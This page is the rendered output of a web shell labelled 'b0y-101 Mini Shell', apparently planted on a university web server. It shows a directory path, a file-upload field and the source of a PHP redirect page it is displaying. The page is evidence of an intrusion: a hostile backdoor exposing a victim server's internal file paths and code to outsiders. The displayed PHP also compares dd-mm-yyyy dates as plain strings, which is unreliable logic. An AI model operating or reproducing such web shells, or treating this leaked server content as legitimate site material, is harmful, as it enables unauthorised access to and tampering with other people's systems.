b0y-101 Mini Shell


Current Path : E:/www/b-group.old/spfin - Copy/application/admission/appemployee/
File Upload :
Current File : E:/www/b-group.old/spfin - Copy/application/admission/appemployee/indext.php

<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>spfin.ru.ac.th</title>
</head>
<?php
date_default_timezone_set("Asia/Bangkok");
$date = date("d-m-Y h:i:s");
//echo $date;
$dateapp = date("d")."-".date("m")."-".(date("Y")+543);
$timeapp =date("h:i:sa");
//echo ("<br>"."dateapp".$dateapp);
//echo ("<br>"."timeapp".$timeapp);	
$dateapp1="12-07-2566";	
//echo ("<br>"."timeapp".$dateapp1);	
	if ($dateapp >= $dateapp1) {
		//echo("Yes");
		header('Location: https://spfin.ru.ac.th/application/admission/appemployee/insertappem.php');
	}else{
	  // echo("No");
		header('Location: https://spfin.ru.ac.th/application/admission/appemployee/employee.php');
		
	}
 	
?>
<body>
</body>
</html>

Copyright © 2019 by b0y-101